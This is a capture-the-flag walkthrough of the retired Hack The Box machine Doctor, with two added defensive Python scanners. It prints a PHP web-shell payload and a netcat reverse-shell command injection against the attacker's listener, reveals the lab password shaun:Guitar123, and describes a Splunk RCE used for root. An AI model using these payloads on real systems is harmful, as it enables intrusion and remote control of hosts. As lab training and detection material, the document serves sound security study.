OSCP PREPARATIONS – HTB Doctor

Doctor is a retired Linux machine on Hack The Box. We are expected to obtain the user and root flags by exploiting its vulnerabilities.
Let’s run a network scan with nmap to identify the services on the target machine.

Classic Scan

Full Port Scan

As a result of the network scan, ports 22/tcp (ssh, OpenSSH 8.2), 80/tcp (http, Apache httpd) and 8089/tcp (ssl/http, Splunkd) are open.
Since port 80 is open, we continue in the browser to perform web enumeration.

We performed enumeration on the web application but did not obtain enough information, so we run directory and file scans with gobuster.

The gobuster scan did not find any results. So much inconclusiveness 😊 We perform web enumeration again in case something was overlooked, and the address info@doctors.htb on the main page attracts our attention.

Here we add the doctors.htb hostname to the /etc/hosts file and access the site again.

After editing the hosts file, we access doctors.htb, where we are greeted by the login page.

Default passwords do not work and we can’t log in. I register myself in the Register tab.

Let’s log in on the login screen with the user we created.

After logging in, we continue enumeration.

We looked at the source code, checked developer mode, and ran a gobuster directory scan, with no significant results.
Next we enumerated the interface itself (looking for input fields or URL values that could be tampered with).
The New Message section is the input field here, so let’s add a message.

Adding works. Now let’s add input values outside the normal flow, thinking like an attacker. The following
<script>alert("hi")</script>
<?php system($_GET['cmd']);?>
whoami
pwd
payloads were added as messages, but none of them produced any output in the response.

Since none of these produce output in the response, let’s check the interaction with curl to see whether the commands are actually executed.

As you can see, the command is executed here. Let’s try to get ourselves a reverse shell.
curl http://10.10.14.13/$(nc.traditional$IFS-e/bin/sh$IFS'10.10.14.13'$IFS'4747')
We try to get a reverse shell using this command.
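From the defender’s side, the interesting question is how a payload like the one above (command substitution and `$IFS` used as a whitespace substitute, often URL-encoded) shows up in web server logs. The following is an added example, not part of the original writeup: a small Python scanner that parses Apache combined-format access log lines, URL-decodes the request target (repeatedly, to peel double encoding), and flags the shell-injection indicators. The log lines are constructed for the example; the IP and payload shapes mirror the page, nothing else is assumed.

```python
import re
from urllib.parse import unquote

# Constructed sample of Apache combined-format access log lines (not taken from the page).
SAMPLE_LOG = """\
10.10.14.13 - - [12/Oct/2020:10:01:02 +0000] "GET /home HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.10.14.13 - - [12/Oct/2020:10:01:05 +0000] "GET /?cmd=whoami HTTP/1.1" 200 12 "-" "curl/7.68.0"
10.10.14.13 - - [12/Oct/2020:10:01:09 +0000] "GET /?u=http://10.10.14.13/%24(nc.traditional%24IFS-e/bin/sh) HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.14.13 - - [12/Oct/2020:10:02:00 +0000] "GET /static/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status code of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of shell command injection, checked against the decoded request target.
INDICATORS = [
    ("ifs_obfuscation", re.compile(r"\$\{?IFS\}?")),          # $IFS / ${IFS} replacing spaces
    ("command_substitution", re.compile(r"\$\(|`")),          # $( ... ) or backticks
    ("shell_binary", re.compile(r"/bin/(?:ba)?sh\b")),        # explicit shell path
    ("netcat", re.compile(r"\bnc(?:\.traditional|at)?\b")),   # nc / nc.traditional / ncat
    ("cmd_parameter", re.compile(r"[?&]cmd=")),               # generic ?cmd= parameter
]


def decode_target(raw: str) -> str:
    """URL-decode up to three times so %2524 -> %24 -> $ is peeled back to the literal."""
    prev, cur = None, raw
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def scan_access_log(text: str) -> list:
    """Return one finding per log line whose decoded request target matches an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = decode_target(m["path"])
        reasons = [name for name, rx in INDICATORS if rx.search(path)]
        if reasons:
            hits.append({"ip": m["ip"], "time": m["ts"], "path": path, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {",".join(hit["reasons"])} {hit["path"]}')
```

Running it on the sample flags the `?cmd=` probe and the `$IFS`/netcat request and ignores the ordinary page and stylesheet requests; the same indicator list can be fed into an alerting rule, and the repeated decoding step is what stops a `%2524IFS` variant from slipping past a single-decode check.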

We have our shell with low privileges, so we need to perform privilege escalation.
We perform local enumeration by running the LinPEAS tool.

Here a backup file attracted our attention when we looked for password information in it.

We obtained the password for user Shaun.
With it we were able to get our user flag.
Since we don’t have access to the /root directory, we continue with enumeration.
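A credential sitting in a readable backup file is what turned the web shell into a user account here, so a defender wants to find such leftovers before an attacker does. The following added example (not code from the original writeup) scans the text of a backup for credential-looking configuration assignments and URL parameters and reports them with the values redacted, so the report itself does not leak the secret. The backup contents and the pattern names are constructed for the example.

```python
import re

# Constructed sample contents of a world-readable backup file (not from the page).
SAMPLE_BACKUP = """\
# config.bak
db_host = localhost
db_user = app
db_password = S3cretValue!
[12/Oct/2020:09:12:00] "POST /reset_password?email=user@doctors.htb&new_pass=Example123 HTTP/1.1" 302
listen_port = 8080
"""

# Order matters: URL parameters are checked first so that "new_pass=..." inside a logged
# request is classified as a URL leak rather than as a config assignment.
CRED_PATTERNS = [
    ("url_parameter", re.compile(r"(?i)[?&](?:pass(?:word|wd)?|pwd|new_pass|token)=[^&\s\"]+")),
    ("config_assignment", re.compile(r"(?i)(?:pass(?:word|wd)?|pwd|secret|token)\s*[:=]\s*\S+")),
]


def redact(match: str) -> str:
    """Keep the key and separator, show the first two value characters, mask the rest."""
    m = re.match(r"(.*?[:=]\s*)(.*)$", match)
    key, value = m.group(1), m.group(2)
    return key + value[:2] + "*" * max(len(value) - 2, 0)


def find_credentials(text: str) -> list:
    """Return one redacted finding per line that looks like it carries a credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in CRED_PATTERNS:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "kind": kind, "match": redact(m.group(0))})
                break  # one finding per line is enough for a report
    return findings


if __name__ == "__main__":
    for f in find_credentials(SAMPLE_BACKUP):
        print(f'line {f["line"]:>3} {f["kind"]:<18} {f["match"]}')
```

Pointed at a directory of backups (for example from a cron job before the files are handed to a backup share), this gives a quick list of files that should either be purged of secrets or have their permissions tightened; the redaction keeps the scanner’s own output safe to paste into a ticket.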

linpeas.sh did not give us detailed information, and in local enumeration we could not get anything useful from the files. There was a Splunkd service here, so let’s try to connect to it.

Here it shows a version warning.
When we clicked on Services it asked us for credentials; we were able to log in with shaun:Guitar123.

There were many tabs in the Services screen.
First, let’s start with the version and see whether there is an exploit for it.

We saw that there is an RCE vulnerability for this version.

We download the exploit code from GitHub.

Let’s try to run the Python code.

This is how we obtained root privileges.